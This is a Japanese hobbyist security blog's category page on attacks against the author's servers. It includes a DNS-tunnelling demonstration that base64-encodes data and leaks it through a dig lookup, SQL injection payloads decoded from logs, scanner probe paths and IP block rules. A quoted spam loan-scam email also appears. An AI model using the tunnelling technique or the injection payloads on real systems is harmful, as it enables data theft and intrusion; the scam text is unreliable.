UJP - 攻撃/ブルートフォースカテゴリのエントリ

Life is fun and easy!

不正IP報告数

Okan Sensor
 
メイン
ログイン
ブログ カテゴリ一覧

  • カテゴリ 攻撃/ブルートフォース の最新配信
  • RSS
  • RDF
  • ATOM

ブログ - 攻撃/ブルートフォースカテゴリのエントリ

DNSトンネリング

カテゴリ : 
セキュリティ » 攻撃/ブルートフォース
ブロガー : 
ujpblog 2024/5/28 13:34
 DNSトンネリングの実演はこんな感じ.

 送信したい秘密のデータが"HELLO"だとして,それを一見わからないように暗号化.今回の場合はbase64でエンコード.
$ echo HELLO |base64🆑
SEVMTE8K
$
 エンコードしたデータをホスト部としてDNSルックアップする.

$ dig SEVMTE8K.google.com🆑

; <<>> DiG 9.10.6 <<>> SEVMTE8K.google.com
;; global options: +cmd
;; Got answer:

;; QUESTION SECTION:
;SEVMTE8K.google.com.		IN	A🈁
$
 そんなホストは無いと返答がある.

 これでgoogle.comのDNSサーバには,SEVMTE8Kというホスト名を検索したというDNSログが残る.DNSクエリを送った対象サーバが悪のあるデータ収集サーバだったら...

 悪意のあるプログラムが,DNSリクエストに偽装してデータを送信することでセキュリティゲートウェイやツールでの検知を逃れるのがDNSトンネリング.

 よってよくわからない命名規則のホスト名になるSEVMTE8KSEVMTE8KSEVMTE8K.google.comとかの場合,セキュリティツールで検知するように動作する場合がある.
 クラウドサービスを使っていてサーバをオートスケールにしている場合,ホスト名はランダムでユニークなものが付与されて時としてSEVMTE8KSEVMTE8KSEVMTE8Kみたいなホスト名になるので,それが検知される場合がある.

 情報漏洩になる事象なのか,過検知なのかは,自動では判明しづらいが,セキュリティツールで検知したとしてもワーニング程度にしていることが多い.つまりアラートは通知されるけど通信は止めない.


ハッカーは秘密通信とファイアウォールのバイパスのために DNS トンネリングを悪用する
https://community.riskiq.com/article/7f0d7aa3

引用:
Palo Alto は、ハッカーが DNS トンネリングを秘密の通信方法として、また従来のセキュリティ対策を回避するためにどのように利用しているかについて説明します。
引用:
ごきげんよう、



はじめまして。 英国に本拠を置く投資会社は、当社のポートフォリオを世界的に拡大することを非公開で模索しており、プロジェクト/事業の実現可能性と 0877;生可能な保有期間に応じて、期間約 3% の ROI のソフトローンを通じて、現実的で収益性の高いプロジェクト/事業への資金調達に取り組んでいます。 。 個人向けローンもご利用いただけます。
前述の提案についてさらに詳細な議論をすることに興味があれば、喜んでそうさせていただき、あなたの決定に必要な条件を強調表示しま 377;。
できるだけ早くご返信いただければ幸いです。 ご不明な点がございましたら、お気軽にメールでお問い合わせください。

p.twite[@]cwayinvtsp[.]com

よろしくお願いします。
プレストン・トワイト
 2008年から使っている某Webサーバのファンが唸りをあげているので調べたら,データベースのCPUが高負荷.
 Webアクセスログを調べると,SQLインジェクションを受けていました.

 フィンランドのヘルシンキ,パナマ,カナダ,Oracleが関係するFull-stack Software engineerと名乗るRobert de Vriesが設置したサイトが管理しているようになっている.勉強にしては手が混んでいるし素人クローラーでもなさそう.

 単純にSELECT文を発行したアクセスをログから抽出してみるとこんな感じ.

$ grep "SELECT" acc.log |awk '{print $1'}|sort|uniq -c|sort -r🆑
   1616 193.56.113.14
    986 193.56.113.69
    941 193.56.113.62
    765 193.56.113.7
    709 193.56.113.47
    679 193.56.113.52
    618 193.56.113.24
    592 193.56.113.34
    589 193.56.113.43
    546 193.56.113.29
    431 193.56.113.17
    422 193.56.113.39
$
 AbuseIPDBで調べると,素性はよろしくない.



 アクセスの多いIPアドレスからのリクエストパラメータを抽出.
$ grep "193.56.113.14" acc.log.1699488000 |head -n 5|awk '{print $7}'
index.php?page=%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
index.php?page=%2D2047%20%27%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D8371%20%27%29%20UNION%20ALL%20SELECT%20NULL%20FROM%20DUAL%2D%2D
index.php?page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29
%7C%7CCHR%2871%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%7C%7CCHR%28117%29%7C%7CCHR
%2874%29%7C%7CCHR%28100%29%7C%7CCHR%2899%29%7C%7CCHR%2872%29%20FROM%20DUAL%2D%2D
index.php?page=%2D9456%20%27%29%20ORDER%20BY%201%2D%2D
$
 最初の1つをURLデコードするとこうなる.

%2D1756%20%27%29%20ORDER%20BY%2021%2D%2D
↓
-1756 ') ORDER BY 21--

page=%2D9856%20%27%20UNION%20ALL%20SELECT%20CHR%2866%29%7C%7CCHR%2879%29%7C%7CCHR%2871%29%
↓
page=-9856 ' UNION ALL SELECT CHR(66)||CHR(79)||CHR(71)%

 CHR()という関数があるけど,ASCIIコード表から可視化してみた.

...続きを読む

 先週長時間SQLインジェクション攻撃を受けたのだけれど,また攻撃を受けた.

 手口は前回と同じHavijを使ったもの.

 execでcmd_shellでcatを実行してpasswdファイルを読み取ろうとしている.いわゆるパストラバーサル.

 AbuseIPDBで調べるとまた同時に共通点が1つ見つかりました.


 Microsoft Cloudを使っているようだが,今度はインドになっている.こういうのは通報窓口はあるのだろうか.
 長時間SQLインジェクション攻撃を受けた件の続報.

 まず,攻撃をしてきていたMicrosoft Cloudが管理しているIPアドレスは,その後もSQLインジェクション報告が各国から相次いでいる模様.


 それでも100%ブラックには成らないのだなぁ.

 そしてトップルータのCPU使用率について考察.


 通常時よりは負荷がかかっていた様だけれど,単一セッションだったためかルータのDDoSになるほどでは無かった模様.
 逆にDBサーバの状態は深刻.


 接続によるスレッドの作成状況は少し増えた程度で変わりがないがテーブルロックが多発している.この辺りを鑑みて,アラートをあげるお手製の仕組みがあれば良いのかな.
 寝ようかと思っていたら,サーバのファンが高音でウナっているので状況を確認.


 HTTPD数が最大アクセスになっていた.Webアクセスログ数を確認するとこんな感じ.


 13時間もアクセスを続けているのは異常.

...続きを読む

WhisperGateとHermeticWiper

カテゴリ : 
セキュリティ » 攻撃/ブルートフォース
ブロガー : 
ujpblog 2022/3/10 15:51
 Microsoftのこの記事.

Destructive malware targeting Ukrainian organizations
https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

引用:
1 月 13 日、マイクロソフトは、マスター ブート レコード (MBR) ワイパーアクティビティの可能性があると思われるウクライナからの侵入活動を特定しました。調査の中で、ウクライナの複数の被害者組織に対する侵入攻撃に使用されているユニークなマルウェア機能が見つかりました。
 ランサムウェアのように見えて,身代金要求がなくPCを動作不能にするだけだった模様.

 そしてSentinelLABのこの記事.

HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine
https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/

引用:
エグゼクティブサマリー

  • 2月23日、脅威インテリジェンスコミュニティは、ウクライナの組織で流通している新しいワイパーマルウェアサンプルを観察し始めました。
  • この分析では、署名されたドライバーが Windows デバイスを対象とするワイパーを展開するために使用され、MBR を操作して、その後のブート失敗が発生していることを示しています。
  • ウクライナ国内の数百台のPCに展開されたHermeticWiperマルウェアがPCを稼働させない様にした.

     この「偽の身代金メッセージ」と「破壊的」の手口は,2017年のウクライナを攻撃したNotPetyaに似ているそう.NotPetyaはロシア連邦軍参謀本部情報総局(GRU)が起こしたと分析されている.

    サンドワーム
    https://ja.wikipedia.org/wiki/%E3%82%B5%E3%83%B3%E3%83%89%E3%83%AF%E3%83%BC%E3%83%A0

     ウクライナ侵攻の2月24日の前日に時限で動き,ウクライナ政府機関を狙っているという点で,状況証拠的にもロシアの国家的サイバー攻撃と整理されているそうです.平昌オリンピックの開会式直前で動いたOlympic Destroyerも時限だったし.

    HTTP 408エラー

    カテゴリ : 
    セキュリティ » 攻撃/ブルートフォース
    ブロガー : 
    ujpblog 2022/3/8 15:52
     今日もロシア政府のサイトにアクセスしてみたのだけれど,珍しいHTTP 408エラーが出てます.


     サーバ側のエラーになる503(Service Temporarily Unavailable)はよく見る?けれど,クライアント側からのリクエスト送信が遅いってこと.

     他のネットワーク接続が遅いわけでも無いから,経路中のどこかがシェイピングされている感じかなぁ.相手のサーバはちゃんと動いているっぽい.

     人道的なところからロシアとのインターネットは遮断しないという意見が多いようだけれど,統一方針は無いので企業ごとに対応は違っていて,一部プロバイダが遮断していることもある模様.
     そうなると経路迂回をするので遅くなったりするかも.

     ショッピングやサービス系は次々と停止していて,昨日今日はTikTokがロシア国内からの通信を遮断した様だけれど,ロシアからの声もロシアへの声も聞こえないってことか.

     やっぱラジオかな.
     サイバー攻撃を受けているというロシア政府のWebサイトにアクセスしてみたら半死状態でしたが,では現時点でのウクライナ政府のサイトはどうなのか.


     すごくシンプルな内容.トップページは問題なくアクセスできるしレスポンスタイムも悪く無いが,3つの画像のリンク先はアクセスできない.

     暫定的にこの様なシンプルページになっているのか?と思い,Web Archveで過去のサイトを確認.


     2014年現在でも同じ様な作りでした.

     ちなみに,Webサーバの設置してあるIPアドレスを調べてみました.


     ブルガリアってなっています.ブルガリアもソ連の侵攻を受けて衛星国家だったが,今回のロシアの行動を容認できないといっていた国防大臣がSNSでの反発を受けて首相に罷免されたそうだ.どのポジションなんだろう.
     ロシアへのアクセスが遮断されているのでは?ということで,
    ロシア政府のサイトへアクセスしてみたら,半死状態でした.

     ちょうど,ロシアのドーピング?違法っぽいドラッグサイトからの迷惑メールが届いたので確認してみました.
     まずはメール.


     よくあるバイアグラ.本文にはビタミンとサプリメントと書いてあるけれどメアドにズバリバイアグラ.
     URLがロシアなのでアクセスしてみると.


     問題なくアクセスできますね.ロシアにあるカナダファーマシー?


     このドメインのIPアドレスを調べるとモスクワとなっています.

     ロシア的にはバイアグラの販売サイトは違法なのか知らないけれど,民間?のフィッシングサイトなので問題なく現在もアクセスできる様ですね.

    ロシアへのアクセス

    カテゴリ : 
    セキュリティ » 攻撃/ブルートフォース
    ブロガー : 
    ujpblog 2022/3/7 11:31
     日経の記事.

    ロシア、自国ネットを「防衛遮断」か ハッカーと攻防 2022年3月4日 18:00 (2022年3月5日 5:50更新)
    https://www.nikkei.com/article/DGXZQOUC273W50X20C22A2000000/

    引用:
    ロシアが自国のサイバー防衛のため、一部サイトの海外からのネット接続を遮断している可能性が出てきた。日本経済新聞の調べでは同国国防省や金融機関などのサイトがロシア国内や親ロ国からのアクセスのみを許可する状態となっていた。ハッカー集団「アノニマス」対策との見方がある。当事国以外も巻き込みサイバー攻防は入り組んだ展開となっている。

     3月5日にロシア政府のサイトにアクセスしたら,ERR_CONNECTION_RESETとなった.



     IPアドレスはこんな感じ.



     IPアドレスの評価は・・・


     ひどいもんだ.アノニマスに乗っ取られて悪いことされ放題状態に陥っていたのかな?

     今,アクセスするとこんな感じ.


     これじゃぁロシア政府が声明を出そうとしても,インターネッツは役に立ちませんね.
     毎日のMailSumのレポートが楽しみな今日この頃.


     ブルートフォースは封じられた...が,よくみると近いサブネットからゆるりとアクセスが来ている.


    AbuseIPDBにレポートするには,面倒なタイプ.
     
    Wordpress 用FileManager を標的としたアクセスの観測等について
    https://www.npa.go.jp/cyberpolice/important/2020/202011201.html

     WordPress用.
    wp-content/plugins/wp-file-manager/readme.txt
    wp-content/plugins/wp-file-manager/lib/php/
    
     Docker API用.
    GET /v1.16/version
    GET /version
    GET /_ping
    HEAD /_ping
    GET /v1.18/coutainers/json
    GET /v1.40/containers/json?all=1
    GET /info
    GET /images/json?
    

     アクセスログ状に,これらのアクセスが記録されて居たら,何かあるってことかな.
     IPAの発表.

    インターネット定点観測レポート(2020年 7~9月)
    https://www.jpcert.or.jp/tsubame/report/report202007-09.html

     TCP 445ポートが増えている模様.SMBですな.うちにもそういうのが届いて居るか,モニタリングしてみるかなぁ...
     日々遮断していることで,エラーも減って来ました. 


     総当たりで突破される可能性が低くなるだけの意味はあるね.ルータのCPUも目に見えて増えてはいないし.

     世の中的にはIoTマルウェアのパケットが増加しているそうだ.

    日本国内のMiraiの特徴を持つパケットの送信元IPアドレス数急増について
    https://blog.nicter.jp/2020/10/jp_mirai_spike/

     んー.プロバイダと切断する都度IPアドレスが変わるタイプを使われるとIPアドレスのブロックというのも限界(過剰)となることもあるということか.
     今日時点で53 IPを登録して来たけれど.(ほぼ手動)
     自分がレポートしたものが最初の事案もちらほら.たとえばこれ.



    引用:
     Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.
    最近のレポート。先週、このIPアドレスから虐待的な活動の報告を受けました。それは潜在的にまだ積極的に虐待活動に従事しています。
     嫌がらせということも考えられるので,1レポートだけでも4%なのでしょう.でも間違いなく自分のルータが攻撃されたエビデンス.


     1日に14回もSSHで接続しようとしているので,間違いなく悪意があるでしょう.そんなサービスは提供していないので.
     SASL LOGIN authentication failedを発生させる接続を遮断.
    ip filter 2601 reject-nolog 45.142.120.0/24 * * * *
    ip filter 2602 reject-nolog 140.238.101.176 * * * *
    ip filter 2603 reject-nolog 120.130.176.55 * * * *
    ip filter 2604 reject-nolog 45.145.185.119 * * * *
    ip filter 2605 reject-nolog 212.70.149.0/24 * * * *
    ip filter 2606 reject-nolog 159.89.103.100 * * * *
    ip filter 2607 reject-nolog 193.169.252.206 * * * *
    ip filter 2608 reject-nolog 141.98.10.0/24 * * * *
    ip filter 2609 reject-nolog 156.96.47.5 * * * *
    ip filter 2610 reject-nolog 103.253.42.54 * * * *
    ip filter 2611 reject-nolog 185.36.81.33 * * * *
    ip filter 2612 reject-nolog 195.168.129.74 * * * *
    ip filter 2613 reject-nolog 107.170.127.8 * * * *
    ip filter 2614 reject-nolog 94.102.49.117 * * * *
    ip filter 2615 reject-nolog 45.129.33.0/24 * * * *
    ip filter 2616 reject-nolog 195.54.161.0/24 * * * *
    ip filter 2617 reject-nolog 193.27.228.153 * * * *
    ip filter 2618 reject-nolog 143.110.150.24 * * * *
    ip filter 2619 reject-nolog 45.125.65.0/24 * * * *
    ip filter 2620 reject-nolog 103.207.38.234 * * * *
    ip filter 2621 reject-nolog 37.49.225.201 * * * *
    ip filter 2622 reject-nolog 141.98.80.76 * * * *
    ip filter 2623 reject-nolog 5.188.206.201 * * * *
    ip filter 2624 reject-nolog 195.54.161.0/24 * * * *
    ip filter 2625 reject-nolog 45.145.66.0/24 * * * *
    
     最初はフィルタ追加して遮断することで,相手の行動変化を観察しようとしたけれど,攻撃が止むモノ,気にせず攻撃を続けるモノの2つにしか別れないので,観察は中止して10件以上エラーを発生させている場合は普通にブロック.
     自動化していかねば...
     AbuseIPDBに自分の管理するIPアドレスが登録されてしまったので,アカウントを取得して解除申請をしたのだけれど,受け付けたとかどうだとか何もなく・・・


     もう一回申請しようとたら,協議中の事で静観...

     ふと,さっき見たら解除されていました.


     そして解除したとメールが来て居ました.

     3〜4日で解除されるということかな.よかったよかった.
     AbuseIPDBで被疑のIPアドレスを調査していて,デフォルトで自分のアクセスしたIPアドレスが入っている状態で,間違ってCHECKボタンを押してしまったら,なんと2020年9月20日に,登録されてしまってました.


    ちょっと濡れ衣は困るので,削除してもらおうとコンタクトしようとすると・・・・


    引用:
    Important: Please do not contact us with requests to remove an IP address abuse report! Registered users have the option to remove their own reports via the "My Reports" section of your user control panel. Furthermore, there is an takedown request feature on the each reported IPs page, usable by all registered users.

    重要: IPアドレスの不正使用レポートを削除する要求で私たちに連絡しないでください! 登録ユーザーは、ユーザーコントロールパネルの "マイレポート "セクションを介して自分のレポートを削除するオプションがあります。さらに、報告された各IPsページには、すべての登録ユーザーが利用できる削除要求機能があります。
     無料ユーザに登録すると,削除申請できるらしい...むむむっ・・・


    引用:
    Join the AbuseIPDB community, contribute abuse reports, and use the API to protect your lower-traffic servers and websites.
    AbuseIPDB コミュニティに参加し、不正使用レポートを投稿し、API を使用して低トラフィックのサーバーやウェブサイトを保護します。

    FREE FOREVER!
    1,000 IP Checks & Reports / Day
    100 Prefix Checks/Day
    Basic Blacklist

     だそうです. 登録して,サインインする.


     拡大してこれ.



     REQUEST TAKEDOWN! 取り下げて!


     しばらく様子を見るか...と言いつつこれを買いている時点で23時間くらい経過しているけれど...
     ブロックして観察していると諦めてアクセスしてこなくなる場合もあれば,気にせず機械的にアクセスし続けて来る場合もある. 


    2020.10.28のレポート

     現在の定義はこれ.
    ip filter 2601 reject 43.142.120.0/24 * * * *
    ip filter 2602 reject 140.238.101.176 * * * *
    ip filter 2603 reject 120.130.176.55 * * * *
    ip filter 2604 reject-nolog 45.145.185.119 * * * *
    ip filter 2605 reject-nolog 212.70.149.0/24 * * * *
    ip filter 2606 reject 159.89.103.100 * * * *
    ip filter 2607 reject 193.169.252.206 * * * *
    ip filter 2608 reject 141.98.10.0/24 * * * *
    ip filter 2609 reject 156.96.47.5 * * * *
    ip filter 2610 reject 103.253.42.54 * * * *
    ip filter 2611 reject 185.36.81.33 * * * *
    ip filter 2612 reject 195.168.129.74 * * * *
    ip filter 2613 reject 107.170.127.8 * * * *
    
     あまりにも遮断されるアクセスが多いものは,ログあふれも頻繁に発生させるのでreject-nologとして観察も中止.

    3年前に「ヤマハのRTX1100で中国からの不正なVPNをブロックする」として観察していた不正アクセスしてくるTop 10のIPアドレスは,今調べるとほとんどはクリーンなIPアドレスとして評価されている模様.(情報が抹消されただけと)
     イランからのブルートフォース.止めるまでの間にも攻撃を加速していた模様.


     1600回越えだったものが1000以下にできたのでサブネットでブロックしたのも効果的か.
     ただし,そうするとまた新たな攻撃が目立って来る.


     イギリスのやばいやつだ.Fixed Line ISPってなっているので,固定IPでSASL LOGINしてきているので,MI5かなにかか?

     ということで,サブネットでブロックして見たけれど,えらいことになりました.


     4秒に一回程度のスピードで複数のIPアドレスを使ってブルートフォースしてきている.

     ふと,攻撃遮断くんを眺めていたら・・・


     見覚えのあるIPアドレスが....国旗を見ると,こちらもイランになっている.イランのサイバー攻撃手法でイギリスにある固定IPのサーバが乗っ取られて攻撃してきているということか?(全部推測)

    攻撃遮断くん 統計データ
    https://shadan-kun.com/map/


     APT33かな?

    ATP33
    https://attack.mitre.org/groups/G0064/

    引用:
    APT33は、少なくとも2013年から活動を行っているイランの脅威グループと疑われています。同グループは、米国、サウジアラビア、韓国の複数の産業にまたがる組織を標的にしており、特に航空・エネルギー分野に関心を寄せている。
     うちのサイトも,空飛ぶポケモンを大事にしているし,メガシンカさせるためのメガエナジーを貯めているのでそういうサイトに該当するのかも.
     うちのメールサーバのMailSumのレポートを見ていると,SASL Loginに大量の失敗をしているIPアドレスが.


    2020.10.20


     素性を調べると,イランでした.スコアも良くない.IPアドレスをブロック.


     早速ブロック.


    2020.10.23<

     ブロックしたのだけれど,それに気づいたようで別のIPアドレスからアクセスが来ることに.

     観察していると2日ほどで元の攻撃件数に戻ったので,セグメント毎ブロック.
     

    2020.10.26

     これでしばらく落ち着くかなぁ.(やり出したら永遠の戦い)
     クラウド系として整理できるホスティングサービスから,当サイトへのアクセスをブロックすることにしてみました.サーバからのアクセスなので基本的に人間じゃないので,攻撃と思えるようなアクセスが多いのです.

     アクセスブロック効果はでていて,サーバの負荷が下がった...わけでもなく偶にスパイクされる事がある.嫌がらせアクセスなのかなぁ.

     あまぞんやさくらのIPアドレス範囲は公開されてないので,しばらくはアドレスを収集して,ブロックしていく感じになります.取り急ぎ,自動収集とブロックのシステムを開発して投入してみました.

     海外からのアクセスもブロックする仕組みを作りたいな.

    直近のトレンド

    カテゴリ : 
    セキュリティ » 攻撃/ブルートフォース
    ブロガー : 
    ujpblog 2014/2/13 21:50
     SSHブルートフォースの傾向?を調べてみた.

    rootユーザで接続を試みる奴

     こんな感じで集計してみた.
    $ grep root secure.log*|grep "error: PAM: "|awk '{print $13}'|sort|uniq -c
     するとこんな結果が.
    36490 122.228.207.219
    783 124.173.121.191
    67 80.193.233.35

    3万5千回! ちなみに3つとも中国のIPアドレス.

    どんなユーザで接続を試みているのか

    ...続きを読む


    広告スペース
    Google